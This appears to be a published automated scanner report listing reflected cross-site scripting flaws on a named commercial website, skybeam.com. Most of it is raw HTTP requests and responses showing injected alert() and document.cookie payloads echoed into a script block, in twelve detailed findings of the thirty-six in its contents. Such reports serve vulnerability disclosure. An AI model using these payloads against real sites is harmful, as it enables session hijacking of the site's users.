Report generated by XSS.CX at Wed Nov 24 19:59:58 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://skybeam.com/central.php [name of an arbitrarily supplied request parameter]

1.2. http://skybeam.com/residential.php [name of an arbitrarily supplied request parameter]

1.3. http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0 [REST URL parameter 2]

1.4. http://skybeam.com/residential.php/images/favicon.ico [REST URL parameter 3]

1.5. http://skybeam.com/residential.php/images/hdr_no_contracts.gif [REST URL parameter 3]

1.6. http://skybeam.com/residential.php/images/hdr_referral_prog.gif [REST URL parameter 3]

1.7. http://skybeam.com/residential.php/images/logo.png [REST URL parameter 3]

1.8. http://skybeam.com/residential.php/images/nav_business.png [REST URL parameter 3]

1.9. http://skybeam.com/residential.php/images/nav_contact.png [REST URL parameter 3]

1.10. http://skybeam.com/residential.php/images/nav_home.png [REST URL parameter 3]

1.11. http://skybeam.com/residential.php/images/nav_residential.png [REST URL parameter 3]

1.12. http://skybeam.com/residential.php/images/nav_support.png [REST URL parameter 3]

1.13. http://skybeam.com/residential.php/images/referral-icon.jpg [REST URL parameter 3]

1.14. http://skybeam.com/residential.php/images/shadowRight.gif [REST URL parameter 3]

1.15. http://skybeam.com/residential.php/site-tx/images/call-for-best-offer.gif [REST URL parameter 4]

1.16. http://skybeam.com/residential.php/site-tx/images/res-bundle.jpg [REST URL parameter 4]

1.17. http://skybeam.com/residential.php/site-tx/images/res-internet.jpg [REST URL parameter 4]

1.18. http://skybeam.com/residential.php/site-tx/images/res-phone.jpg [REST URL parameter 4]

1.19. http://skybeam.com/support.php [name of an arbitrarily supplied request parameter]

1.20. http://skybeam.com/residential.php [region cookie]

1.21. http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0 [region cookie]

1.22. http://skybeam.com/residential.php/images/favicon.ico [region cookie]

1.23. http://skybeam.com/residential.php/images/hdr_no_contracts.gif [region cookie]

1.24. http://skybeam.com/residential.php/images/hdr_referral_prog.gif [region cookie]

1.25. http://skybeam.com/residential.php/images/logo.png [region cookie]

1.26. http://skybeam.com/residential.php/images/nav_business.png [region cookie]

1.27. http://skybeam.com/residential.php/images/nav_contact.png [region cookie]

1.28. http://skybeam.com/residential.php/images/nav_home.png [region cookie]

1.29. http://skybeam.com/residential.php/images/nav_residential.png [region cookie]

1.30. http://skybeam.com/residential.php/images/nav_support.png [region cookie]

1.31. http://skybeam.com/residential.php/images/referral-icon.jpg [region cookie]

1.32. http://skybeam.com/residential.php/images/shadowRight.gif [region cookie]

1.33. http://skybeam.com/residential.php/site-tx/images/call-for-best-offer.gif [region cookie]

1.34. http://skybeam.com/residential.php/site-tx/images/res-bundle.jpg [region cookie]

1.35. http://skybeam.com/residential.php/site-tx/images/res-internet.jpg [region cookie]

1.36. http://skybeam.com/residential.php/site-tx/images/res-phone.jpg [region cookie]



1. Cross-site scripting (reflected)
There are 36 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://skybeam.com/central.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /central.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5fc3'-alert(1)-'af29135f3ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central.php/e5fc3'-alert(1)-'af29135f3ef HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/index.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; state=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; __utmc=84641179; __utmb=84641179.1.10.1290618259

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 16007


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('e5fc3'-alert(1)-'af29135f3ef');</script>
...[SNIP]...

1.2. http://skybeam.com/residential.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f768e'-alert(1)-'9beabf74cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/f768e'-alert(1)-'9beabf74cd0 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; state=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; __utmc=84641179; __utmb=84641179.1.10.1290618259

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 16:30:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14474


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('f768e'-alert(1)-'9beabf74cd0');</script>
...[SNIP]...

1.3. http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/f768e'-alert(document.cookie)-'9beabf74cd0

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2a63'-alert(1)-'f7006457f03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/f768e'-alert(document.cookie)-'9beabf74cd0f2a63'-alert(1)-'f7006457f03 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('f768e'-alert(document.cookie)-'9beabf74cd0f2a63'-alert(1)-'f7006457f03');</script>
...[SNIP]...

1.4. http://skybeam.com/residential.php/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b464'-alert(1)-'093f7c68316 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/favicon.ico9b464'-alert(1)-'093f7c68316 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 14485
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('favicon.ico9b464'-alert(1)-'093f7c68316');</script>
...[SNIP]...

1.5. http://skybeam.com/residential.php/images/hdr_no_contracts.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/hdr_no_contracts.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 943c4'-alert(1)-'0f70adecef8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/hdr_no_contracts.gif943c4'-alert(1)-'0f70adecef8 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('hdr_no_contracts.gif943c4'-alert(1)-'0f70adecef8');</script>
...[SNIP]...

1.6. http://skybeam.com/residential.php/images/hdr_referral_prog.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/hdr_referral_prog.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 728a8'-alert(1)-'ec2fe8b22d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/hdr_referral_prog.gif728a8'-alert(1)-'ec2fe8b22d5 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('hdr_referral_prog.gif728a8'-alert(1)-'ec2fe8b22d5');</script>
...[SNIP]...

1.7. http://skybeam.com/residential.php/images/logo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/logo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f26'-alert(1)-'44331a788d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/logo.png83f26'-alert(1)-'44331a788d6 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('logo.png83f26'-alert(1)-'44331a788d6');</script>
...[SNIP]...

1.8. http://skybeam.com/residential.php/images/nav_business.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_business.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab1a0'-alert(1)-'b3615681bd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/nav_business.pngab1a0'-alert(1)-'b3615681bd7 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('nav_business.pngab1a0'-alert(1)-'b3615681bd7');</script>
...[SNIP]...

1.9. http://skybeam.com/residential.php/images/nav_contact.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_contact.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6040'-alert(1)-'26e4909c4c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/nav_contact.pngd6040'-alert(1)-'26e4909c4c8 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 14489
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('nav_contact.pngd6040'-alert(1)-'26e4909c4c8');</script>
...[SNIP]...

1.10. http://skybeam.com/residential.php/images/nav_home.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_home.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a95'-alert(1)-'823c9dc045d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/nav_home.pngd1a95'-alert(1)-'823c9dc045d HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('nav_home.pngd1a95'-alert(1)-'823c9dc045d');</script>
...[SNIP]...

1.11. http://skybeam.com/residential.php/images/nav_residential.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_residential.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9f3'-alert(1)-'096bf243737 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/nav_residential.png8b9f3'-alert(1)-'096bf243737 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('nav_residential.png8b9f3'-alert(1)-'096bf243737');</script>
...[SNIP]...

1.12. http://skybeam.com/residential.php/images/nav_support.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_support.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83209'-alert(1)-'1f7b896494d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/nav_support.png83209'-alert(1)-'1f7b896494d HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 14489
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('nav_support.png83209'-alert(1)-'1f7b896494d');</script>
...[SNIP]...

